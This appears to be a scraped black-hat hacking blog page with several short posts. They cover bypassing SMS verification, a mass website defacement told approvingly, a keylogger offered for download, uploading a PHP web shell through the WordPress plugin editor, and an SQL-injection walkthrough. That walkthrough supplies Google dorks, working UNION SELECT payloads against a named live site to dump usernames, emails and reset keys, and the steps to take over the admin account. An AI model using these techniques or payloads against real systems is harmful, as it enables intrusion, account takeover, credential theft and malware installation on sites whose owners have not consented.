Web hosting

Friday, 6 February 2015

Shamitabh (2015) Full Movie Watch Online – Download Mp4

14:58    No comments

Read More

How to Bypass SMS Verification of Any Website

13:16    No comments



In This Tutorial I will Tell you how to Bypass Phone or SMS Verification on any Website. Now a Day many Websites (Google, Facebook etc.) are Using Phone/SMS Verification System after reading This Tutorial You will be Able to Bypass those Verification system easily so Lets Start...


1. When you asked to Enter the Phone Number Goto Receive-SMS-Online and Select you Number and Enter That Where Ever You are Asked to Enter the Phone Number.


2. Now Open That Number which you Selected and Enter for Verification


3. Simply come back and click the number which you have selected, check it out there is your code sent by Verification System.

Read More

700+ websites get hacked by Modi ‘fan’ to support Narendra Modi

13:16    No comments


Narendra Modi, Gujarat's chief minister and the next PM candidate of the India. And he has so many supporters from the youngsters and now a days he is also gets the supports from the hackers.


Narendra%252520Modi%252520Fan%252520Here_thumb%25255B5%25255D

Hacker have hacked and defaced 700+ Indian websites to support and promote Narendra Modi.

The list of the hacked website is here.

You can check out the defacement image in the above snapshot. The message written in the defaced website is “ whatever you fail to detect, will cause your downfall..
Narendra Modi fan is here to tell you the truth.. no one is here like Narendra Modi and thats why sonia gandhi and rahul always barking about Narendra Modi and you all know about aam aadmi party who don’t know what they have to do and waht not always one word dharne par bheth jayenge lol!  we just defaced this site to give you a message vote for MODI!  ”

Read More

[tool] Syslogger

13:14    No comments

AMY H4CK3R was here

you all know guyz  is a best powerful keylogger thats why i m sharing this tool with you guys


its a very nice keylogger ever

Download

Read More

Thursday, 10 April 2014

[Shelling] Wordpress

12:08    No comments

Hi all!
Today i'm going to show you how to upload shell in Wordpress software.

You will need:

1) Admin access to Worpress panel
2) Any php shell

First you need to go to:

Plugins -> Editor

[Image: regiontt.png]

Once there you can edit plugins installed on the site.
Choose any plugin you want...

[Image: regionhs.png]

For example i selected "Server buddy"
Now select one file from right site (It must be .PHP file)

[Image: regioncq.png]

When select you can edit it now.
Take your shell source and paste it there.
Now just save it. (If you got an error try other file,or simply you can't edit plugins)

[Image: regionkc.png]

You just need to access it now.
By default template in wordpress are located in:
Code:
www.site.com/wp-content/plugins/pluginname/pluginfile.php

We know our folder and name of the plugin we edited.

[Image: regionzt.png]

So our final link would be 
Code:
www.site.com/wp-content/plugins/serverbuddy-by-pluginbuddy/serverbuddy.php

[Image: regionj.png]

[Image: regionqc.png]

That would be all for today... :)

Read More

[Tutorial] Hack WordPress site with SQL injection

12:07    No comments

Hack WordPress site with SQL injection
As requested by few of you i decided to make this small tutorial on how to hack a wordpress site that has an SQLi in plugin.


So lets begin.
I will use this 0day here by AMY hacker.

First of all we need to find a vulnerable page.
We enter this in Google:

Code:
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="

# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="

# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"

When you found your site you need to find admin email and username.
I will be using this site for example:
Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3

[Image: regiont.png]

When i add ' text disappears so it is vulnerable.

[Image: regionzn.png]

NOTE: I will not demonstrate how to SQL inject.

Now we need admin username and email.
We need to inject:

Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--

Now we have 2 users.

[Image: regionjhg.png]

We pick one and copy his email.
Go to the login page of the site.
It is usually here:

Code:
http://www.site.com/wp-login.php

And press "Lost your password?"

[Image: regionz.png]

Now you enter either username or email.
We can enter both so it doesnt matter.
I entered email.

[Image: regionby.png]
[Image: regionng.png]

Now when you got:

"Check your e-mail for the confirmation link."

It means that reset key is successfully sent.
Now we need to get the activation key.

Go back to the syntax you used for extracting email and username and do this:

Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--

Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--

[Image: regiongn.png]

Voila!
Now we just need to reset it.

Go to:
Code:
wp-login.php?action=rp&key=resetkey&login=username

NOTE: Replace key= & login= 

So my link will be:

[Image: regionzi.png]

Enter new password:

[Image: thefreenudecelebritysit.png]
[Image: regiongv.png]

Login with new password and shell it.

That's it guys.

Thanks for reading! Black Hat

Read More